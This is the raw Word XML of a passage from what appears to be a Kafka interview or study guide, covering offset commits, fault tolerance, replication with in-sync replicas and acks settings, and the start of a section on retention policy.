      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In cases where you need to ensure that processing is complete before committing, manual offset commit gives finer control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207B5AD4"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void committing offsets too frequently</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Committing too often can impact performance. Instead, commit offsets after a batch of messages is processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37582B3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4C7FCB28"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unique identifier for messages in a Kafka partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA18B0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track their consumption position by committing offsets in the Kafka topic __consumer_offsets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195E9E86"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commit offsets either automatically or manually based on the use case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF4498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help ensure that consumers can </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resume</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processing from the correct position after failures or rebalances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB4B6F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efficiently managing offsets, Kafka enables consumers to process messages reliably and fault-tolerantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3085E662" w14:textId="0D84EB62"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393" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2077AC" w14:textId="4DF54FA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8" w:name="_Toc197868052"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Kafka ensure data reliability and fault tolerance</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="838"/>
    </w:p>
    <w:p w14:paraId="0E057F05" w14:textId="29FD9838" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047"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data reli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Data Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B583A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chieves fault tolerance by replicating data across multiple brokers. This ensures that even if one broker fails, the data is still available on other brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2588DFE2"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 Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each partition in a Kafka topic has on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replica and multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>follower</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> replicas. The leader is the one that handles all reads and writes, while the followers replicate the data from the leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F598DA3" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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leader fails, one of the followers can be promoted to be the new leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399B8B98"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in Action</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the leader of a partition becomes unavailable, Kafka ensures that the system can continue functioning by promoting a follower replica to become the new leader, minimizing downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4716D8"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Acknowledgment Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05442108"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No acknowledgment. The producer sends the message and doesn’t wait for any acknowledgment. This provides low latency but no guarantees of message delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4F0AF5"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1</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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all</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Sync Replicas (ISR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA406B5"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the concept of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s) to ensure that only the replicas that have successfully replicated the message are considered for leader election.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA25A18"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Rs</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Log Segment and Data Retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC05421"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tention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka allows you to configure retention policies (either by time or size). Data is retained for a specified duration or until the size of the log exceeds a threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBB3B08"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mutable Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once written, messages in Kafka are immutable, which means that the integrity of the data is preserved over time. Even if a broker crashes, the messages are still stored on other replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D4911A"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sumer Group Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF5B34"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 groups provide fault tolerance at the consumer level by ensuring that messages are consumed only once, even if a consumer crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEA9BAD"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Rebalancing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Failure Recovery and Fault Tolerance in Brokers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429D452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can fail and recover without affecting the availability of data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267339EC"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 If the leader of a partition fails, Kafka will automatically elect a new leader from one of the in-sync replicas. This minimizes downtime and ensures continued availability of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D81C829"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Failure Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Idempotence and Exactly-Once Semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037FCC6F"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to ensure that messages are neither lost nor processed multiple times due to failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D26FED"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Kafka 0.11 introduced idempotent producers, which ensure that messages are not duplicated even if the producer retries sending the same message due to network issues or broker failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1CBA61"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Distributed Nature of Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B4C78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Fault Tolerance Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781B5320"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Ensures that multiple copies of data are stored across different brokers to provide high availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B50F16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Guarantees that data is not lost by ensuring that only replicas that are fully caught up with the leader are considered for leadership and data storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B49FA3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 Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Offers different acknowledgment levels (such as acks=all) to control the durability of messages and ensure that they are safely replicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60113592"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Failover</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that Kafka consumers can continue consuming messages even if one of the consumers in the group crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F410C5E"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dempotent Producer and Exactly-Once Semantics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevents message duplication and ensures that messages are processed exactly once, even in the case of retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D841BF5"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and Broker Failover</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that if a broker or leader partition fails, another broker or replica can take over, minimizing downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60316D7A" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="00CE4B95" w:rsidRDefault="00B45047" w:rsidP="00B45047">
      <w:pPr>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 xml:space="preserve">Together, these features enable Kafka to provid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even in the event of network failures, broker crashes, or other faults in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5000ADF8" w14:textId="57C7B380"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394" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="099C0EF6" w14:textId="3E45025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39" w:name="_Toc197868053"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Kafka’s replication mechanism and how data is replicated across brokers to prevent data loss</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="839"/>
    </w:p>
    <w:p w14:paraId="652DE418" w14:textId="2DFD3A38" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1"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replication mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> plays a crucial role in ensuring </w:t>
      </w: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53601FB6"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s</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: For fault tolerance, Kafka creates copies (replicas) of each partition and stores these replicas on different brokers. Each partition has a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and one or more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7AE28C5F"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eplication Factor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60301A70"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 1</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: There’s no replication, and if the broker holding the partition fails, data is lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B952C9"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gt; 1</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Data is replicated across multiple brokers, providing fault tolerance. If a broker fails, Kafka can still serve data from the replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A9B79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eader and Follower Replicas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF616FE"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by having one replica act as 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while the others are </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>followers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The leader is responsible for all read and write operations, while the followers replicate the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDCEC03"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 The follower replicas replicate the data from the leader. They only serve read requests if the leader becomes unavailable. Followers are kept in sync with the leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7494B6F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Replication Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083BB6C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producer sends a message to Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E01881"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message is first written to the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of the partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311904C0"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then asynchronously replicates the message to its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27D80534"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followers fetch data from the leader and keep their logs in sync with the leader’s log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254C725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asynchronous replication ensures that Kafka can handle write-heavy workloads, but it introduces a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replication lag</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., followers may not be fully caught up with the leader).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CBFE6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In-Sync Replicas (ISR):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEC6E9F"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data consistency and reliability, Kafka maintains a concept called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 The ISR is the set of replicas that are fully caught up with the leader and are synchronized. A partition is only considered </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>available</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if it has at least one replica in the ISR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C8722"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follower falls behind the leader (i.e., it hasn't replicated the data within a certain time window), it is removed from the ISR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B8D943"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leader’s replica becomes unavailable, one of the in-sync followers is promoted to become the new leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5373C07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only in-sync replicas can be promoted to the leader role, ensuring consistency across replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAC2ED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Replication Acknowledgments (acks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8CAC44"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figuring the acknowledgment behavior for producers. The acks setting controls how many replicas must acknowledge a write before the producer considers it successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B98A36"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The producer does not wait for any acknowledgment. The message is sent to Kafka but there’s no guarantee that the message was written to the brokers or replicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F82DD5"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1</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The producer waits for the leader replica to acknowledge the message. If the leader fails before the message is replicated, the message may be lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0313A7"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 (or acks=-1)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Leader Failover and Partition Rebalancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71964C42"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roker hosting the leader replica fails or becomes unavailable, Kafka automatically promotes one of the in-sync follower replicas to become the new leader. This is called </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF8661B"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at least one replica is in-sync and can take over the leader role to ensure data availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D71E377"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Replication and Fault Tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209F0FD4"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an withstand broker failures if the replication factor is greater than 1. Even if one broker fails, as long as there are in-sync replicas available, Kafka can continue to serve data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112F020C"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nISR</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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How Kafka Handles Data Loss in Case of Failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4953F9E5"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replication mechanism ensures that data is not lost in case of failures by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A69218"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nsuring that multiple copies of data exist across different brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F7CA2"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ing consumers to read from any replica, even if the leader fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689D2B7D"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Replicating the data asynchronously but ensuring that there are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to prevent data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709A560A"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ering </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>acknowledgment settings</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that allow producers to ensure data is reliably written and replicated before acknowledging the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE3B298"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Data Recovery After Broker Failure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19475FE4"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broker fails, Kafka will automatically recover from the failure by reassigning leadership for the partitions hosted on that broker. This reassignment happens based on the in-sync replica set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62366C3E"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partition had more than one replica (with replication factor &gt; 1), one of the in-sync replicas is promoted to the new leader. The system can then continue to process messages without data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE36C2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 Replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB7ED2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Determines how many copies of each partition are stored across the Kafka cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A11CFB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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each partition has one leader and one or more followers to ensure fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185AF54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 (ISR)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Only replicas that are fully caught up with the leader can be considered for promoting to the leader role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747F7AA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 (acks)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The producer can choose different levels of acknowledgment to guarantee message durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59905F4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 If the leader fails, Kafka promotes one of the in-sync followers to become the new leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A4437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covery</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka ensures data availability and consistency by handling partition leader elections and ensuring replicas are synchronized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BD252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utilizing these mechanisms, Kafka achieves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cross a distributed system, ensuring that data is reliably replicated and can survive failures without data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132FAFF2" w14:textId="3FA7ABC4"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395" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5942951D" w14:textId="1FD35593"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0" w:name="_Toc197868054"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the retention policy in Kafka, and how can it be configured</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="840"/>
    </w:p>
    <w:p w14:paraId="6E6C0B99" w14:textId="3422B90E" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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xml:space="preserve">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defines how long Kafka retains messages in a topic’s partitions before they are deleted. Kafka retains messages based on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 and this configuration allows Kafka to automatically delete old messages, ensuring that disk space is managed effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4205D615"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Kafka Retention Policy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F2B3E0"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Kafka stores messages in </w:t>
      </w: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eriod</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Retention Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B654BB"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does </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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an be configured to delete data based on either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w:t>
      </w:r>
